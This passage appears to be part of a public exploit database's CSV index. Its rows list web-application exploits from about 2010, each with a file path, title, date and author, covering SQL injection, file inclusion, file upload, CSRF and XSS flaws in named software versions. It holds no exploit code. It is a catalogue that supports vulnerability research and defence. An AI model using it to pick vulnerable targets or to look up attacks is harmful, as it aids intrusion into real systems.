+14811,exploits/php/webapps/14811.txt,"Joomla! Component com_remository - Arbitrary File Upload",2010-08-26,J3yk0ob,webapps,php, +14808,exploits/php/webapps/14808.pl,"Mini-CMS / News Script Light 1.0 - Remote File Inclusion",2010-08-26,bd0rk,webapps,php, +14809,exploits/php/webapps/14809.txt,"kontakt formular 1.1 - Remote File Inclusion",2010-08-26,bd0rk,webapps,php, +14810,exploits/php/webapps/14810.txt,"Gaestebuch 1.2 - Remote File Inclusion",2010-08-26,bd0rk,webapps,php, +14815,exploits/php/webapps/14815.txt,"pecio CMS 2.0.5 - Multiple Remote File Inclusions",2010-08-27,eidelweiss,webapps,php, +14819,exploits/php/webapps/14819.html,"Pc4Uploader 9.0 - Cross-Site Request Forgery",2010-08-27,RENO,webapps,php, +14820,exploits/php/webapps/14820.txt,"iGaming CMS - Multiple SQL Injections",2010-08-27,Sweet,webapps,php, +14821,exploits/asp/webapps/14821.txt,"Shop Creator 4.0 - SQL Injection",2010-08-27,Pouya_Server,webapps,asp, +14822,exploits/php/webapps/14822.txt,"DIY-CMS 1.0 - Multiple Remote File Inclusions",2010-08-28,LoSt.HaCkEr,webapps,php, +14823,exploits/php/webapps/14823.txt,"textpattern CMS 4.2.0 - Remote File Inclusion",2010-08-28,Sn!pEr.S!Te,webapps,php, +14826,exploits/php/webapps/14826.txt,"GaleriaSHQIP 1.0 - SQL Injection",2010-08-28,Valentin,webapps,php, +14827,exploits/php/webapps/14827.py,"Blogman 0.7.1 - 'profile.php' SQL Injection",2010-08-28,"Ptrace Security",webapps,php, +14829,exploits/php/webapps/14829.txt,"CF Image Hosting Script 1.3 - 'settings.cdb' Information Disclosure",2010-08-28,Dr.$audi,webapps,php, +14833,exploits/php/webapps/14833.txt,"vBulletin 3.8.4/3.8.5 - Registration Bypass",2010-08-29,"Immortal Boy",webapps,php, +14834,exploits/php/webapps/14834.txt,"Max's Guestbook - HTML Injection / Cross-Site Scripting",2010-08-29,"MiND C0re",webapps,php, +14835,exploits/php/webapps/14835.txt,"Multi-lingual E-Commerce System 0.2 - Multiple Remote File Inclusions",2010-08-29,JosS,webapps,php, +14837,exploits/php/webapps/14837.txt,"CF Image Hosting Script 1.3.8 - Remote File Inclusion",2010-08-29,"FoX HaCkEr",webapps,php, +14838,exploits/php/webapps/14838.txt,"Seagull 0.6.7 - SQL Injection",2010-08-29,Sweet,webapps,php, +14839,exploits/php/webapps/14839.txt,"GuestBookPlus - HTML Injection / Bypass Comments Limit",2010-08-29,"MiND C0re",webapps,php, +14841,exploits/php/webapps/14841.txt,"seagull 0.6.7 - Remote File Inclusion",2010-08-30,"FoX HaCkEr",webapps,php, +14845,exploits/php/webapps/14845.txt,"Joomla! Component PicSell 1.0 - Local File Disclosure",2010-08-30,Craw,webapps,php, +14846,exploits/php/webapps/14846.txt,"Joomla! Component JE FAQ Pro 1.5.0 - Multiple Blind SQL Injections",2010-08-31,"Chip d3 bi0s",webapps,php, +14849,exploits/php/webapps/14849.py,"mBlogger 1.0.04 - 'viewpost.php' SQL Injection",2010-08-31,"Ptrace Security",webapps,php, +14854,exploits/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass",2010-09-01,Abysssec,webapps,php, +14851,exploits/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",2010-09-01,Andre_Corleone,webapps,php, +14870,exploits/asp/webapps/14870.txt,"rainbowportal - Multiple Vulnerabilities",2010-09-02,Abysssec,webapps,asp, +14860,exploits/php/webapps/14860.txt,"PHP Joke Site Software - 'sbjoke_id' SQL Injection",2010-09-01,"BorN To K!LL",webapps,php, +14867,exploits/php/webapps/14867.txt,"vbShout 5.2.2 - Local/Remote File Inclusion",2010-09-02,fred777,webapps,php, +14876,exploits/php/webapps/14876.txt,"Shop a la Cart - Multiple Vulnerabilities",2010-09-02,Ariko-Security,webapps,php, +14879,exploits/asp/webapps/14879.txt,"visinia 1.3 - Multiple Vulnerabilities",2010-09-03,Abysssec,webapps,asp, +14884,exploits/php/webapps/14884.txt,"smbind 0.4.7 - SQL Injection",2010-09-03,r00t,webapps,php, +14887,exploits/php/webapps/14887.txt,"SyndeoCMS 2.8.02 - Multiple Vulnerabilities (1)",2010-09-04,Abysssec,webapps,php, +14890,exploits/php/webapps/14890.py,"mBlogger 1.0.04 - 'addcomment.php' Persistent Cross-Site Scripting",2010-09-04,"Ptrace Security",webapps,php, +14891,exploits/php/webapps/14891.txt,"PHP Classifieds ADS - 'sid' Blind SQL Injection",2010-09-04,"BorN To K!LL",webapps,php, +14893,exploits/php/webapps/14893.txt,"PHP Classifieds 7.3 - Remote File Inclusion",2010-09-04,alsa7r,webapps,php, +14894,exploits/php/webapps/14894.py,"A-Blog 2.0 - '/sources/search.php' SQL Injection",2010-09-05,"Ptrace Security",webapps,php, +14896,exploits/php/webapps/14896.txt,"Joomla! Component iJoomla Magazine 3.0.1 - Remote File Inclusion",2010-09-05,LoSt.HaCkEr,webapps,php, +14897,exploits/php/webapps/14897.txt,"ChillyCMS 1.1.3 - Multiple Vulnerabilities",2010-09-05,AmnPardaz,webapps,php, +14898,exploits/asp/webapps/14898.txt,"ifnuke - Multiple Vulnerabilities",2010-09-05,Abysssec,webapps,asp, +14901,exploits/php/webapps/14901.txt,"Joomla! Component Clantools 1.5 - Blind SQL Injection",2010-09-05,Solidmedia,webapps,php, +14902,exploits/php/webapps/14902.txt,"Joomla! Component Clantools 1.2.3 - Multiple Blind SQL Injections",2010-09-05,Solidmedia,webapps,php, +14913,exploits/asp/webapps/14913.txt,"DMXReady Members Area Manager - Persistent Cross-Site Scripting",2010-09-06,"L0rd CrusAd3r",webapps,asp, +14908,exploits/asp/webapps/14908.txt,"DMXready Polling Booth Manager - SQL Injection",2010-09-05,"L0rd CrusAd3r",webapps,asp, +14910,exploits/php/webapps/14910.txt,"Softbiz Article Directory Script - 'sbiz_id' Blind SQL Injection",2010-09-05,"BorN To K!LL",webapps,php, +14911,exploits/php/webapps/14911.sh,"Joomla! Component Gantry 3.0.10 - Blind SQL Injection",2010-09-05,jdc,webapps,php, +14932,exploits/windows/webapps/14932.py,"ColdCalendar 2.06 - SQL Injection",2010-09-07,mr_me,webapps,windows, +14914,exploits/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",webapps,asp, +14915,exploits/php/webapps/14915.txt,"InterPhoto Gallery - Multiple Vulnerabilities",2010-09-06,Abysssec,webapps,php, +14919,exploits/asp/webapps/14919.txt,"Micronetsoft Rental Property Management Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",webapps,asp, +14922,exploits/php/webapps/14922.txt,"Joomla! Component Aardvertiser 2.1 - Blind SQL Injection",2010-09-06,"Stephan Sattler",webapps,php, +14923,exploits/php/webapps/14923.txt,"WordPress Plugin Events Manager Extended - Persistent Cross-Site Scripting",2010-09-06,Craw,webapps,php, +14931,exploits/php/webapps/14931.php,"java Bridge 5.5 - Directory Traversal",2010-09-07,Saxtor,webapps,php, +14927,exploits/php/webapps/14927.txt,"dynpage 1.0 - Multiple Vulnerabilities",2010-09-07,Abysssec,webapps,php, +14933,exploits/windows/webapps/14933.txt,"ColdBookmarks 1.22 - SQL Injection",2010-09-07,mr_me,webapps,windows, +14934,exploits/windows/webapps/14934.txt,"ColdOfficeView 2.04 - Multiple Blind SQL Injections",2010-09-07,mr_me,webapps,windows, +14935,exploits/windows/webapps/14935.py,"ColdUserGroup 1.06 - Blind SQL Injection",2010-09-07,mr_me,webapps,windows, +14942,exploits/php/webapps/14942.txt,"1024 CMS 2.1.1 - Blind SQL Injection",2010-09-07,"Stephan Sattler",webapps,php, +14943,exploits/asp/webapps/14943.txt,"sirang web-based d-control - Multiple Vulnerabilities",2010-09-08,Abysssec,webapps,asp, +14952,exploits/php/webapps/14952.txt,"Visitors Google Map Lite 1.0.1 Free mod_visitorsgooglemap Module - SQL Injection",2010-09-09,"Chip d3 bi0s",webapps,php, +14954,exploits/asp/webapps/14954.txt,"aradblog - Multiple Vulnerabilities",2010-09-09,Abysssec,webapps,asp, +15442,exploits/php/webapps/15442.txt,"Zeeways Adserver - Multiple Vulnerabilities",2010-11-06,Valentin,webapps,php, +15443,exploits/php/webapps/15443.txt,"Joomla! Component com_forme 1.0.5 - Multiple Vulnerabilities",2010-11-06,jdc,webapps,php, +14960,exploits/php/webapps/14960.txt,"ES Simple Download 1.0. - Local File Inclusion",2010-09-09,Kazza,webapps,php, +14962,exploits/multiple/webapps/14962.txt,"CS-Cart 1.3.3 - 'install.php' Cross-Site Scripting",2010-09-09,crmpays,webapps,multiple,80 +14964,exploits/php/webapps/14964.txt,"Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion",2010-09-10,"Chip d3 bi0s",webapps,php, +14965,exploits/php/webapps/14965.txt,"fcms 2.2.3 - Remote File Inclusion",2010-09-10,LoSt.HaCkEr,webapps,php, +14968,exploits/php/webapps/14968.txt,"symphony 2.0.7 - Multiple Vulnerabilities",2010-09-10,JosS,webapps,php, +14969,exploits/asp/webapps/14969.txt,"ASP Nuke - SQL Injection",2010-09-11,Abysssec,webapps,asp, +14973,exploits/php/webapps/14973.txt,"piwigo-2.1.2 - Multiple Vulnerabilities",2010-09-11,Sweet,webapps,php, +14977,exploits/php/webapps/14977.txt,"MyHobbySite 1.01 - SQL Injection / Authentication Bypass",2010-09-12,"YuGj VN",webapps,php, +14980,exploits/asp/webapps/14980.txt,"eshtery CMS - SQL Injection",2010-09-12,Abysssec,webapps,asp, +14985,exploits/php/webapps/14985.txt,"System Shop - 'Module aktka' SQL Injection",2010-09-12,secret,webapps,php, +14986,exploits/php/webapps/14986.txt,"Alstrasoft AskMe Pro 2.1 - 'profile.php' SQL Injection",2010-09-12,CoBRa_21,webapps,php, +14988,exploits/php/webapps/14988.txt,"Group Office 3.5.9 - SQL Injection",2010-09-13,ViciOuS,webapps,php, +14989,exploits/php/webapps/14989.txt,"osDate - 'uploadvideos.php' Arbitrary File Upload",2010-09-13,Xa7m3d,webapps,php, +14991,exploits/asp/webapps/14991.txt,"Luftguitar CMS - Upload Arbitrary File",2010-09-13,Abysssec,webapps,asp, +14995,exploits/php/webapps/14995.txt,"Joomla! Component com_mtree 2.1.5 - Arbitrary File Upload",2010-09-13,jdc,webapps,php, +14996,exploits/php/webapps/14996.txt,"Storyteller CMS - 'var' Local File Inclusion",2010-09-13,"BorN To K!LL",webapps,php, +14997,exploits/php/webapps/14997.txt,"UCenter Home 2.0 - SQL Injection",2010-09-13,KnocKout,webapps,php, +14998,exploits/php/webapps/14998.txt,"Joomla! Component JGen 0.9.33 - SQL Injection",2010-09-14,**RoAd_KiLlEr**,webapps,php, +14999,exploits/asp/webapps/14999.txt,"freediscussionforums 1.0 - Multiple Vulnerabilities",2010-09-14,Abysssec,webapps,asp, +15004,exploits/php/webapps/15004.pl,"E-Xoopport Samsara 3.1 (Sections Module) - Blind SQL Injection",2010-09-14,_mRkZ_,webapps,php, +15006,exploits/php/webapps/15006.txt,"eNdonesia 8.4 - SQL Injection",2010-09-15,vYc0d,webapps,php, +15011,exploits/php/webapps/15011.txt,"PHP microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,webapps,php, +15014,exploits/php/webapps/15014.txt,"PixelPost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,webapps,php, +36828,exploits/java/webapps/36828.txt,"JaWiki - 'versionNo' Cross-Site Scripting",2012-02-17,sonyy,webapps,java, +15018,exploits/asp/webapps/15018.txt,"mojoportal - Multiple Vulnerabilities",2010-09-16,Abysssec,webapps,asp, +15029,exploits/php/webapps/15029.txt,"phpMyFamily - Multiple Vulnerabilities",2010-09-17,Abysssec,webapps,php, +15037,exploits/php/webapps/15037.html,"CMSimple - Cross-Site Request Forgery",2010-09-18,Abysssec,webapps,php, +15039,exploits/php/webapps/15039.txt,"xt:Commerce Gambio 2008 < 2010 - 'reviews.php' Error-Based SQL Injection",2010-09-18,secret,webapps,php, +15040,exploits/php/webapps/15040.txt,"Joomla! Component Restaurant Guide 1.0.0 - Multiple Vulnerabilities",2010-09-18,Valentin,webapps,php, +15041,exploits/php/webapps/15041.py,"Maian Gallery 2 - Local File Download",2010-09-18,mr_me,webapps,php, +15044,exploits/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,webapps,asp, +15046,exploits/php/webapps/15046.txt,"Fashione E-Commerce Webshop - Multiple SQL Injections",2010-09-19,secret,webapps,php, +15049,exploits/php/webapps/15049.txt,"BoutikOne 1.0 - SQL Injection",2010-09-19,BrOx-Dz,webapps,php, +15050,exploits/php/webapps/15050.txt,"Opencart 1.4.9.1 - Arbitrary File Upload",2010-09-19,Net.Edit0r,webapps,php, +15100,exploits/win_x86/webapps/15100.txt,"Joomla! Component Elite Experts - SQL Injection",2010-09-24,**RoAd_KiLlEr**,webapps,win_x86,80 +15058,exploits/asp/webapps/15058.html,"VWD-CMS - Cross-Site Request Forgery",2010-09-20,Abysssec,webapps,asp, +15060,exploits/php/webapps/15060.txt,"LightNEasy CMS 3.2.1 - Blind SQL Injection",2010-09-20,Solidmedia,webapps,php, +15064,exploits/php/webapps/15064.txt,"primitive CMS 1.0.9 - Multiple Vulnerabilities",2010-09-20,"Stephan Sattler",webapps,php, +15067,exploits/asp/webapps/15067.txt,"Personal.Net Portal - Multiple Vulnerabilities",2010-09-21,Abysssec,webapps,asp, +15070,exploits/php/webapps/15070.txt,"ibPhotohost 1.1.2 - SQL Injection",2010-09-21,fred777,webapps,php, +15075,exploits/php/webapps/15075.txt,"wpQuiz 2.7 - Authentication Bypass",2010-09-21,KnocKout,webapps,php, +15078,exploits/asp/webapps/15078.txt,"gausCMS - Multiple Vulnerabilities",2010-09-22,Abysssec,webapps,asp, +15080,exploits/php/webapps/15080.txt,"Skybluecanvas 1.1-r248 - Cross-Site Request Forgery",2010-09-22,Sweet,webapps,php, +15082,exploits/php/webapps/15082.txt,"BSI Hotel Booking System Admin 1.4/2.0 - Authentication Bypass",2010-09-22,K-159,webapps,php, +15084,exploits/php/webapps/15084.txt,"Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injections",2010-09-22,"Salvatore Fresta",webapps,php, +15085,exploits/php/webapps/15085.txt,"Joomla! Component Joostina - SQL Injection",2010-09-22,Gamoscu,webapps,php, +15090,exploits/php/webapps/15090.txt,"WAnewsletter 2.1.2 - SQL Injection",2010-09-23,BrOx-Dz,webapps,php, +15091,exploits/php/webapps/15091.txt,"GeekLog 1.3.8 (filemgmt) - SQL Injection",2010-09-23,Gamoscu,webapps,php, +15092,exploits/php/webapps/15092.txt,"OvBB 0.16a - Multiple Local File Inclusions",2010-09-23,cOndemned,webapps,php, +15093,exploits/php/webapps/15093.txt,"Collaborative Passwords Manager 1.07 - Multiple Local File Inclusions",2010-09-24,sh00t0ut,webapps,php, +15098,exploits/php/webapps/15098.txt,"FreePBX 2.8.0 - Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",webapps,php, +15114,exploits/php/webapps/15114.php,"ZenPhoto - Config Update / Command Execution",2010-09-26,Abysssec,webapps,php, +15102,exploits/win_x86/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery (Add Admin)",2010-09-24,"John Johnz",webapps,win_x86,80 +15106,exploits/asp/webapps/15106.txt,"VisualSite CMS 1.3 - Multiple Vulnerabilities",2010-09-25,Abysssec,webapps,asp, +15157,exploits/php/webapps/15157.txt,"Joomla! Component JE Guestbook 1.0 - Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",webapps,php, +15118,exploits/asp/webapps/15118.txt,"gokhun asp stok 1.0 - Multiple Vulnerabilities",2010-09-26,KnocKout,webapps,asp, +15119,exploits/php/webapps/15119.txt,"PEEL Premium 5.71 - SQL Injection",2010-09-26,KnocKout,webapps,php, +15110,exploits/php/webapps/15110.txt,"E-Xoopport Samsara 3.1 (eCal Module) - Blind SQL Injection",2010-09-25,_mRkZ_,webapps,php, +15120,exploits/cfm/webapps/15120.txt,"Blue River Mura CMS - Directory Traversal",2010-09-26,mr_me,webapps,cfm, +15121,exploits/php/webapps/15121.txt,"pbboard 2.1.1 - Multiple Vulnerabilities",2010-09-27,JIKO,webapps,php, +15124,exploits/asp/webapps/15124.txt,"ndCMS - SQL Injection",2010-09-27,Abysssec,webapps,asp, +15126,exploits/php/webapps/15126.txt,"Entrans - SQL Injection",2010-09-27,keracker,webapps,php, +15130,exploits/cgi/webapps/15130.sh,"Barracuda Networks Spam & Virus Firewall 4.1.1.021 - Remote Configuration Retrieval",2010-09-27,ShadowHatesYou,webapps,cgi, +15128,exploits/win_x86/webapps/15128.txt,"Allpc 2.5 osCommerce - SQL Injection / Cross-Site Scripting",2010-09-27,**RoAd_KiLlEr**,webapps,win_x86,80 +15198,exploits/php/webapps/15198.txt,"Aprox CMS Engine 6.0 - Multiple Vulnerabilities",2010-10-03,"Stephan Sattler",webapps,php, +15135,exploits/php/webapps/15135.txt,"Car Portal 2.0 - Blind SQL Injection",2010-09-27,**RoAd_KiLlEr**,webapps,php, +15143,exploits/php/webapps/15143.txt,"e107 0.7.23 - SQL Injection",2010-09-28,"High-Tech Bridge SA",webapps,php, +15139,exploits/asp/webapps/15139.txt,"AtomatiCMS - Upload Arbitrary File",2010-09-28,Abysssec,webapps,asp, +15141,exploits/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass",2010-09-28,Abysssec,webapps,php, +15144,exploits/windows/webapps/15144.txt,"Aleza Portal 1.6 - Insecure SQL Injection / Cookie Handling",2010-09-28,KnocKout,webapps,windows, +15145,exploits/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorisation Vulnerabilities",2010-09-28,"Pablo Milano",webapps,php, +15146,exploits/php/webapps/15146.txt,"Achievo 1.4.3 - Cross-Site Request Forgery",2010-09-28,"Pablo Milano",webapps,php, +15147,exploits/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent Cross-Site Scripting",2010-09-28,"SecPod Research",webapps,php, +15151,exploits/php/webapps/15151.txt,"Webspell 4.2.1 - 'asearch.php' SQL Injection",2010-09-29,"silent vapor",webapps,php, +15152,exploits/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net - static Blind SQL Injection",2010-09-29,"Easy Laster",webapps,php, +15153,exploits/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass",2010-09-29,"silent vapor",webapps,php, +15154,exploits/php/webapps/15154.txt,"MyPhpAuction 2010 - 'id' SQL Injection",2010-09-29,"BorN To K!LL",webapps,php, +15160,exploits/asp/webapps/15160.txt,"ASPMass Shopping Cart - Arbitrary File Upload / Cross-Site Request Forgery",2010-09-30,Abysssec,webapps,asp, +15162,exploits/php/webapps/15162.rb,"Joomla! Component JE Job - SQL Injection",2010-09-30,"Easy Laster",webapps,php, +15163,exploits/php/webapps/15163.rb,"Joomla! Component JE Directory 1.0 - SQL Injection",2010-09-30,"Easy Laster",webapps,php, +15164,exploits/php/webapps/15164.txt,"JomSocial 1.8.8 - Arbitrary File Upload",2010-09-30,"Jeff Channell",webapps,php, +15165,exploits/php/webapps/15165.txt,"zen cart 1.3.9f - Multiple Vulnerabilities",2010-10-01,LiquidWorm,webapps,php, +15166,exploits/php/webapps/15166.txt,"Zen Cart 1.3.9f (typefilter) - Local File Inclusion",2010-10-01,LiquidWorm,webapps,php, +15169,exploits/php/webapps/15169.txt,"Evaria Content Management System 1.1 - File Disclosure",2010-10-01,"khayeye shotor",webapps,php, +15174,exploits/php/webapps/15174.txt,"Tiki Wiki CMS Groupware 5.2 - Multiple Vulnerabilities",2010-10-01,"John Leitch",webapps,php, +15173,exploits/php/webapps/15173.txt,"phpMyShopping 1.0.1505 - Multiple Vulnerabilities",2010-10-01,Metropolis,webapps,php, +15171,exploits/php/webapps/15171.txt,"jCart 1.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery/Open Redirect Vulnerabilities",2010-10-01,p0deje,webapps,php, +15175,exploits/php/webapps/15175.txt,"Chipmunk Board 1.3 - 'index.php?forumID' SQL Injection",2010-10-01,Shamus,webapps,php, +15199,exploits/asp/webapps/15199.py,"Cilem Haber 1.4.4 (Tr) - Database Disclosure",2010-10-04,ZoRLu,webapps,asp, +15183,exploits/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure",2010-10-02,ZoRLu,webapps,asp, +15177,exploits/php/webapps/15177.pl,"iGaming CMS 1.5 - Blind SQL Injection",2010-10-01,plucky,webapps,php, +15185,exploits/asp/webapps/15185.txt,"SmarterMail < 7.2.3925 - Persistent Cross-Site Scripting",2010-10-02,sqlhacker,webapps,asp, +15189,exploits/asp/webapps/15189.txt,"SmarterMail < 7.2.3925 - LDAP Injection",2010-10-02,sqlhacker,webapps,asp, +15191,exploits/asp/webapps/15191.txt,"TradeMC E-Ticaret - SQL Injection / Cross-Site Scripting",2010-10-02,KnocKout,webapps,asp, +15194,exploits/php/webapps/15194.txt,"TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload",2010-10-03,Hackeri-AL,webapps,php, +15200,exploits/php/webapps/15200.txt,"FAQMasterFlex 1.2 - SQL Injection",2010-10-04,cyb3r.anbu,webapps,php, +15204,exploits/php/webapps/15204.txt,"DNET Live-Stats 0.8 - Local File Inclusion",2010-10-04,blake,webapps,php, +15205,exploits/php/webapps/15205.txt,"Aspect Ratio CMS - Blind SQL Injection",2010-10-04,"Stephan Sattler",webapps,php, +15207,exploits/php/webapps/15207.txt,"Uebimiau Webmail 3.2.0-2.0 - Local File Inclusion",2010-10-04,blake,webapps,php, +15208,exploits/php/webapps/15208.txt,"CuteNews - 'page' Local File Inclusion",2010-10-05,eidelweiss,webapps,php, +15209,exploits/php/webapps/15209.txt,"SPAW Editor 2.0.8.1 - Local File Inclusion",2010-10-05,"soorakh kos",webapps,php, +15210,exploits/php/webapps/15210.txt,"Cag CMS 0.2 - Cross-Site Scripting / Blind SQL Injection",2010-10-05,Shamus,webapps,php, +15284,exploits/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection",2010-10-19,"Salvatore Fresta",webapps,php, +15217,exploits/php/webapps/15217.txt,"Feindura File Manager 1.0(rc) - Arbitrary File Upload",2010-10-07,KnocKout,webapps,php, +15218,exploits/asp/webapps/15218.txt,"xWeblog 2.2 - 'oku.asp?makale_id' SQL Injection",2010-10-07,KnocKout,webapps,asp, +15219,exploits/asp/webapps/15219.py,"xWeblog 2.2 - 'arsiv.asp?tarih' SQL Injection",2010-10-08,ZoRLu,webapps,asp, +15220,exploits/php/webapps/15220.txt,"Flex Timesheet - Authentication Bypass",2010-10-08,KnocKout,webapps,php, +15222,exploits/php/webapps/15222.txt,"Joomla! Component Community Builder Enhanced (CBE) 1.4.8/1.4.9/1.4.10 - Local File Inclusion / Remote Code Execution",2010-10-09,"Delf Tonder",webapps,php, +15223,exploits/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,webapps,php, +15224,exploits/php/webapps/15224.txt,"Joomla! Component JS Calendar 1.5.1 - Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",webapps,php, +15225,exploits/php/webapps/15225.txt,"VideoDB 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,webapps,php, +15268,exploits/php/webapps/15268.txt,"WikiWebHelp 0.3.3 - Insecure Cookie Handling",2010-10-17,FuRty,webapps,php, +39571,exploits/php/webapps/39571.txt,"ZenPhoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",webapps,php,80 +15269,exploits/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,webapps,php, +15227,exploits/php/webapps/15227.txt,"PHP-Fusion Mod Mg User Fotoalbum 1.0.1 - SQL Injection",2010-10-10,"Easy Laster",webapps,php, +15592,exploits/php/webapps/15592.txt,"sahitya graphics CMS - Multiple Vulnerabilities",2010-11-21,"Dr.0rYX & Cr3W-DZ",webapps,php, +15593,exploits/php/webapps/15593.html,"cPanel 11.x - Cross-Site Request Forgery (Edit E-mail)",2010-11-21,"Mon7rF .",webapps,php, +15594,exploits/php/webapps/15594.txt,"AuraCMS 1.62 - 'pfd.php' SQL Injection",2010-11-22,"Don Tukulesto",webapps,php, +15595,exploits/php/webapps/15595.txt,"jSchool Advanced - Blind SQL Injection",2010-11-22,"Don Tukulesto",webapps,php, +15596,exploits/jsp/webapps/15596.txt,"JCMS 2010 - File Download",2010-11-22,Beach,webapps,jsp, +15597,exploits/asp/webapps/15597.txt,"Acidcat CMS 3.3 - 'FCKeditor' Arbitrary File Upload",2010-11-22,Net.Edit0r,webapps,asp, +15602,exploits/php/webapps/15602.txt,"PHPmotion 1.62 - 'FCKeditor' Arbitrary File Upload",2010-11-23,trycyber,webapps,php, +15605,exploits/php/webapps/15605.txt,"Getsimple CMS 2.01 < 2.02 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",webapps,php, +15230,exploits/asp/webapps/15230.txt,"Site2Nite Auto e-Manager - SQL Injection",2010-10-10,KnocKout,webapps,asp, +15232,exploits/php/webapps/15232.txt,"OrangeHRM 2.6.0.1 - Local File Inclusion",2010-10-11,ZonTa,webapps,php, +15233,exploits/php/webapps/15233.txt,"BaconMap 1.0 - SQL Injection",2010-10-11,"John Leitch",webapps,php, +15234,exploits/php/webapps/15234.txt,"BaconMap 1.0 - Local File Disclosure",2010-10-11,"John Leitch",webapps,php, +15606,exploits/php/webapps/15606.txt,"phpvidz 0.9.5 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",webapps,php, +15607,exploits/php/webapps/15607.txt,"WSN Links - SQL Injection",2010-11-24,"Mark Stanislav",webapps,php, +15237,exploits/php/webapps/15237.rb,"AdaptCMS 2.0.1 Beta - Remote File Inclusion (Metasploit)",2010-10-12,v3n0m,webapps,php, +15239,exploits/php/webapps/15239.html,"WikiWebHelp 0.3.3 - Cross-Site Request Forgery",2010-10-12,Yoyahack,webapps,php, +15240,exploits/php/webapps/15240.txt,"Collabtive 0.65 - Multiple Vulnerabilities",2010-10-12,"Anatolia Security",webapps,php, +15247,exploits/php/webapps/15247.txt,"Exponent CMS 0.97 - Multiple Vulnerabilities",2010-10-13,LiquidWorm,webapps,php, +15249,exploits/php/webapps/15249.txt,"Data/File - upload and Management Arbitrary File Upload",2010-10-14,saudi0hacker,webapps,php, +15251,exploits/php/webapps/15251.txt,"Xlrstats 2.0.1 - SQL Injection",2010-10-14,Sky4,webapps,php, +15608,exploits/php/webapps/15608.txt,"Free Simple Software - SQL Injection",2010-11-24,"Mark Stanislav",webapps,php, +15254,exploits/php/webapps/15254.txt,"KCFinder 2.2 - Arbitrary File Upload",2010-10-15,saudi0hacker,webapps,php, +15270,exploits/asp/webapps/15270.txt,"Kisisel Radyo Script - Multiple Vulnerabilities",2010-10-17,FuRty,webapps,asp, +15610,exploits/php/webapps/15610.txt,"Joomla! Component JE Ajax Event Calendar - SQL Injection",2010-11-25,ALTBTA,webapps,php, +15280,exploits/php/webapps/15280.html,"Travel Portal Script - Cross-Site Request Forgery (Admin Password Change)",2010-10-19,KnocKout,webapps,php, +15276,exploits/php/webapps/15276.txt,"411cc - Multiple SQL Injections",2010-10-18,KnocKout,webapps,php, +15277,exploits/php/webapps/15277.txt,"GeekLog 1.7.0 - 'FCKeditor' Arbitrary File Upload",2010-10-18,"Kubanezi AHG",webapps,php, +15278,exploits/php/webapps/15278.txt,"Brooky CubeCart 2.0.1 - SQL Injection",2010-10-18,X_AviaTique_X,webapps,php, +15281,exploits/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - Cross-Site Request Forgery",2010-10-19,KnocKout,webapps,php, +15290,exploits/jsp/webapps/15290.txt,"Oracle Sun Java System Web Server - HTTP Response Splitting",2010-10-20,"Roberto Suggi Liverani",webapps,jsp, +15300,exploits/php/webapps/15300.txt,"Squirrelcart PRO 3.0.0 - Blind SQL Injection",2010-10-21,"Salvatore Fresta",webapps,php, +15295,exploits/php/webapps/15295.html,"sNews CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-10-21,"High-Tech Bridge SA",webapps,php, +15308,exploits/php/webapps/15308.txt,"Pulse Pro 1.4.3 - Persistent Cross-Site Scripting",2010-10-24,"Th3 RDX",webapps,php, +15309,exploits/php/webapps/15309.txt,"DBHcms 1.1.4 - 'dbhcms_pid' SQL Injection",2010-10-24,ZonTa,webapps,php, +15310,exploits/php/webapps/15310.py,"Jamb - Cross-Site Request Forgery (Add a Post)",2010-10-25,Stoke,webapps,php, +15313,exploits/php/webapps/15313.txt,"Plesk Small Business Manager 10.2.0 and Site Editor - Multiple Vulnerabilities",2010-10-25,"David Hoyt",webapps,php, +15320,exploits/php/webapps/15320.py,"BigACE 2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)",2010-10-26,Sweet,webapps,php, +15321,exploits/php/webapps/15321.txt,"DBHcms 1.1.4 - 'dbhcms_user/SearchString' SQL Injection",2010-10-27,"High-Tech Bridge SA",webapps,php, +15322,exploits/php/webapps/15322.txt,"phpLiterAdmin 1.0 RC1 - Authentication Bypass",2010-10-27,"High-Tech Bridge SA",webapps,php, +15323,exploits/php/webapps/15323.txt,"DZCP (deV!L_z Clanportal) 1.5.4 - Local File Inclusion",2010-10-27,"High-Tech Bridge SA",webapps,php, +15324,exploits/php/webapps/15324.txt,"Novaboard 1.1.4 - Local File Inclusion",2010-10-27,"High-Tech Bridge SA",webapps,php, +15325,exploits/php/webapps/15325.txt,"MyBB 1.6 - Full Path Disclosure",2010-10-27,"High-Tech Bridge SA",webapps,php, +15326,exploits/php/webapps/15326.txt,"BloofoxCMS 0.3.5 - Information Disclosure",2010-10-27,"High-Tech 